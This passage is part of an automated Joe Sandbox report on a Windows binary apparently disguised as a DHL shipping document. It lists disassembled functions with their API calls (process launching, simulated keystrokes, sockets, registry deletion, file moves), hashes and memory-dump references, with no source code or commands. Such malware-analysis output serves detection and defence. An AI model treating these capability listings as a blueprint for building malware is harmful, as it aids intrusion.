                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 642888154-2594219639
                                                                                        • Opcode ID: 454fd061921823eb5d233fc4beebb7d81af7bc3961fbb3d0d2bb10e5b88e7fae
                                                                                        • Instruction ID: 04ce002bf23613aa3bd42c55d10c618e50956fe161a0e3f8017e1dbf6c8cab43
                                                                                        • Opcode Fuzzy Hash: 454fd061921823eb5d233fc4beebb7d81af7bc3961fbb3d0d2bb10e5b88e7fae
                                                                                        • Instruction Fuzzy Hash: E341A334600340AFDB22DF24C499B957BE0FF49319F1841B9F9688F6A2C731AD56CB68
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00C63033
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 45a66f8c26423e5238180645f853ff314aaeae510c22b9b1caad3d8e87ab4e96
                                                                                        • Instruction ID: e2f7393cee1598d38c44b3e79df3d34db8eb062d507db74606669be988d250dd
                                                                                        • Opcode Fuzzy Hash: 45a66f8c26423e5238180645f853ff314aaeae510c22b9b1caad3d8e87ab4e96
                                                                                        • Instruction Fuzzy Hash: B3110531248386BAF7349A55ECC2DAF6B9C9F15320F20002AFA00A6181DB706F4866A5
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C64312
                                                                                        • LoadStringW.USER32(00000000), ref: 00C64319
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C6432F
                                                                                        • LoadStringW.USER32(00000000), ref: 00C64336
                                                                                        • _wprintf.LIBCMT ref: 00C6435C
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C6437A
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00C64357
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 8395d986afe8d86b0284ca951e2287199dd9f9b498f066d0cf63abb46f8ac0ff
                                                                                        • Instruction ID: 3eff01fd33d1998ad6db70ac8bbf07ffd93f440ae94c19ba06b17ef701057b9f
                                                                                        • Opcode Fuzzy Hash: 8395d986afe8d86b0284ca951e2287199dd9f9b498f066d0cf63abb46f8ac0ff
                                                                                        • Instruction Fuzzy Hash: B90162F2900208BFE711A7A0DD89FFE776CEB08300F0005B5B745E2051EA749E864B75
                                                                                        APIs
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C3C1C7,00000004,00000000,00000000,00000000), ref: 00C02ACF
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C3C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00C02B17
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C3C1C7,00000004,00000000,00000000,00000000), ref: 00C3C21A
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C3C1C7,00000004,00000000,00000000,00000000), ref: 00C3C286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 62b30fae9e11538de628053d47d989143132904ed088338271c2611784b22bfd
                                                                                        • Instruction ID: c79174320e504ba2e712946697cbcb26d82e1d867bc0c78f5328441c5c732f49
                                                                                        • Opcode Fuzzy Hash: 62b30fae9e11538de628053d47d989143132904ed088338271c2611784b22bfd
                                                                                        • Instruction Fuzzy Hash: 9C412B307146809FDB359B29CCCCB6F7B92AB45314F24881DF167965E1CA75A982F720
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C670DD
                                                                                          • Part of subcall function 00C20DB6: std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                          • Part of subcall function 00C20DB6: __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C67114
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00C67130
                                                                                        • _memmove.LIBCMT ref: 00C6717E
                                                                                        • _memmove.LIBCMT ref: 00C6719B
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00C671AA
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C671BF
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C671DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 256516436-0
                                                                                        • Opcode ID: 03f9a581152c1aa55cc8075a5ce13b97dbc621256cdaa599dff6e65ed19ac30b
                                                                                        • Instruction ID: 7674db127f6e20fee856ada8b6cf27870ac41d9d6605ce51794502582f61cf48
                                                                                        • Opcode Fuzzy Hash: 03f9a581152c1aa55cc8075a5ce13b97dbc621256cdaa599dff6e65ed19ac30b
                                                                                        • Instruction Fuzzy Hash: 1D31AD31900215EBCF10DFA4EC85AAFB7B8EF45710F2441BAF904AB246DB309E51DBA4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2931989736-0
                                                                                        • Opcode ID: 45aa7915dec6a31c71752182c5351bca72074d24ca74225edc9f0418cfc1050c
                                                                                        • Instruction ID: a8ff8a40091649728c51ee3005417920c5af0190a50771ad8ff08c5188e5c872
                                                                                        • Opcode Fuzzy Hash: 45aa7915dec6a31c71752182c5351bca72074d24ca74225edc9f0418cfc1050c
                                                                                        • Instruction Fuzzy Hash: 4F2105656012197BEA047612AD42FFF7B5C9F2034AF084020FD0996A47EBA4EF59D2AD
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                          • Part of subcall function 00C1FC86: _wcscpy.LIBCMT ref: 00C1FCA9
                                                                                        • _wcstok.LIBCMT ref: 00C6EC94
                                                                                        • _wcscpy.LIBCMT ref: 00C6ED23
                                                                                        • _memset.LIBCMT ref: 00C6ED56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        • Opcode ID: 55c1b389b97eb659fae177358649451cb4cbe437b64f362c74aa65b8328fcf69
                                                                                        • Instruction ID: 671d574c2dee340c6a351ac28e84c1dd1aa620fa90ec15010d58293b8005cc35
                                                                                        • Opcode Fuzzy Hash: 55c1b389b97eb659fae177358649451cb4cbe437b64f362c74aa65b8328fcf69
                                                                                        • Instruction Fuzzy Hash: 7EC18F75608300DFC724EF64C885A6AB7E4FF85314F10892DF9999B2A2DB31ED45DB82
                                                                                        APIs
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C76C00
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C76C21
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C76C34
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00C76CEA
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00C76CA7
                                                                                          • Part of subcall function 00C5A7E9: _strlen.LIBCMT ref: 00C5A7F3
                                                                                          • Part of subcall function 00C5A7E9: _memmove.LIBCMT ref: 00C5A815
                                                                                        • _strlen.LIBCMT ref: 00C76D44
                                                                                        • _memmove.LIBCMT ref: 00C76DAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3619996494-0
                                                                                        • Opcode ID: b3c45dd52ee504a306cad36a33e336c76353ccab29bf30830f2b1c712dd5a259
                                                                                        • Instruction ID: c2de1f62d882ca8f1c9825f36506e8e6a78e2969bc4893b39a8697adff2aa0e5
                                                                                        • Opcode Fuzzy Hash: b3c45dd52ee504a306cad36a33e336c76353ccab29bf30830f2b1c712dd5a259
                                                                                        • Instruction Fuzzy Hash: 4B81CE71208700AFD720EB24CC82F6BB7A8EF95714F148A1DF9599B2D2DA70AD05DB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90f6ac8dcf2aebeecde429ffe70e257e7327cd9db27b0c84bc2bc354063bbea2
                                                                                        • Instruction ID: c0f597f521d6e214871ed89b939023487d4b37bb4392ec1825bfbfa01b1dc65a
                                                                                        • Opcode Fuzzy Hash: 90f6ac8dcf2aebeecde429ffe70e257e7327cd9db27b0c84bc2bc354063bbea2
                                                                                        • Instruction Fuzzy Hash: 84716E30900109EFDB05CF99CC89ABEBB79FF85314F188159F915AA2A1C734AA51DF64
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C7F448
                                                                                        • _memset.LIBCMT ref: 00C7F511
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00C7F556
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                          • Part of subcall function 00C1FC86: _wcscpy.LIBCMT ref: 00C1FCA9
                                                                                        • GetProcessId.KERNEL32(00000000), ref: 00C7F5CD
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C7F5FC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 3522835683-2766056989
                                                                                        • Opcode ID: 7951bbb9c47d43d46a26625b0344699d2dc5df1eda82e824738753162f9b1cf2
                                                                                        • Instruction ID: 84290174d68e221d6389175a2f7af38d1b2e221ee8407024ec22542797d53494
                                                                                        • Opcode Fuzzy Hash: 7951bbb9c47d43d46a26625b0344699d2dc5df1eda82e824738753162f9b1cf2
                                                                                        • Instruction Fuzzy Hash: 6461AFB5A00619DFCB14DF64C481AAEBBF5FF48310F14816DE859AB391CB30AE42DB90
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00C60F8C
                                                                                        • GetKeyboardState.USER32(?), ref: 00C60FA1
                                                                                        • SetKeyboardState.USER32(?), ref: 00C61002
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C61030
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C6104F
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C61095
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C610B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: cb1c3e30899b2f63591546451b090c80d8201dd7b7ab713878e0b636189e60df
                                                                                        • Instruction ID: 3094f6e4bdae240a44cf5dac367ae3e1813f3fe6387e90130ed286169201c308
                                                                                        • Opcode Fuzzy Hash: cb1c3e30899b2f63591546451b090c80d8201dd7b7ab713878e0b636189e60df
                                                                                        • Instruction Fuzzy Hash: AE5123A06047D53DFB3242748C95BBBBFA95B06301F0C8589E5E4968D3C2E8EEC9D751
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00C60DA5
                                                                                        • GetKeyboardState.USER32(?), ref: 00C60DBA
                                                                                        • SetKeyboardState.USER32(?), ref: 00C60E1B
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C60E47
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C60E64
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C60EA8
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C60EC9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 8809b277414305c75095e1da0e39fbb2b22e7b607f24e1fdd85b306bff3a5fce
                                                                                        • Instruction ID: c14df696033dbef6f2ac8e5d8979b1c91118e75cb594c099bff43e083763b6d4
                                                                                        • Opcode Fuzzy Hash: 8809b277414305c75095e1da0e39fbb2b22e7b607f24e1fdd85b306bff3a5fce
                                                                                        • Instruction Fuzzy Hash: 495126A05447E53DFB3683748C95B7B7FA96B06300F1C898DF1E4A64C2D396AE98E350
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: 6643cae3a16e95fc1ad44def64ea8795cfec075b4ab12c2854b6e3f9e83f146a
                                                                                        • Instruction ID: 2aaa19bc32d0893b2555ebb7b4c56e891c0883bd74e0f4340a63c9f3ed7e0bb4
                                                                                        • Opcode Fuzzy Hash: 6643cae3a16e95fc1ad44def64ea8795cfec075b4ab12c2854b6e3f9e83f146a
                                                                                        • Instruction Fuzzy Hash: BA419275C1062476CB21EBB4DC86ACFB3B89F04310F508966F519E3621EB34E395D7AA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 0-2594219639
                                                                                        • Opcode ID: 6bb855a673a727a640f43c9b0fe802a8fb4007c2f1a9014f099bc8e70d5b2093
                                                                                        • Instruction ID: de3677be1de71f5f398140fd0f5b0e5c44fd86bf2010aeb219a74a12ed63c84a
                                                                                        • Opcode Fuzzy Hash: 6bb855a673a727a640f43c9b0fe802a8fb4007c2f1a9014f099bc8e70d5b2093
                                                                                        • Instruction Fuzzy Hash: 6A41C635904114EFE714EF28CC4CFADBBA4EB09314F150266F826A72E1C730AE41EB59
APIs
  • Part of subcall function 00C6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C63697,?), ref: 00C6468B
  • Part of subcall function 00C6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C63697,?), ref: 00C646A4
• lstrcmpiW.KERNEL32(?,?), ref: 00C636B7
• _wcscmp.LIBCMT ref: 00C636D3
• MoveFileW.KERNEL32(?,?), ref: 00C636EB
• _wcscat.LIBCMT ref: 00C63733
• SHFileOperationW.SHELL32(?), ref: 00C6379F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: f9b2f79c84972637a132df5091b0e8dc92a87f8f708a80038a4eb609980a4736
• Instruction ID: 64eac304b3ce0dadb6aa9b5c5117c1cc442d2fcd5a952532588b3f9cfb97496c
• Opcode Fuzzy Hash: f9b2f79c84972637a132df5091b0e8dc92a87f8f708a80038a4eb609980a4736
• Instruction Fuzzy Hash: D3416371508344AEC765EF64D881ADF77E8EF89340F00092EB49AC3151EA34D789D756
APIs
• _memset.LIBCMT ref: 00C872AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C87351
• IsMenu.USER32(?), ref: 00C87369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C873B1
• DrawMenuBar.USER32 ref: 00C873C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: 430b32e60f85c24d0b1aa2b604ba092c37e52e50bfa103282dc35fdd9086cd3c
• Instruction ID: bc85120b1f5cfb0ac9530c98b202772f7a9e863547f3a9aff4f3cc81693c7102
• Opcode Fuzzy Hash: 430b32e60f85c24d0b1aa2b604ba092c37e52e50bfa103282dc35fdd9086cd3c
• Instruction Fuzzy Hash: CB411675A44208EFDB20EF50D884E9ABBB8FB05354F248629FD15A7260E730EE50EB55
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C80FD4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C80FFE
• FreeLibrary.KERNEL32(00000000), ref: 00C810B5
  • Part of subcall function 00C80FA5: RegCloseKey.ADVAPI32(?), ref: 00C8101B
  • Part of subcall function 00C80FA5: FreeLibrary.KERNEL32(?), ref: 00C8106D
  • Part of subcall function 00C80FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C81090
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00C81058
Memory Dump Source
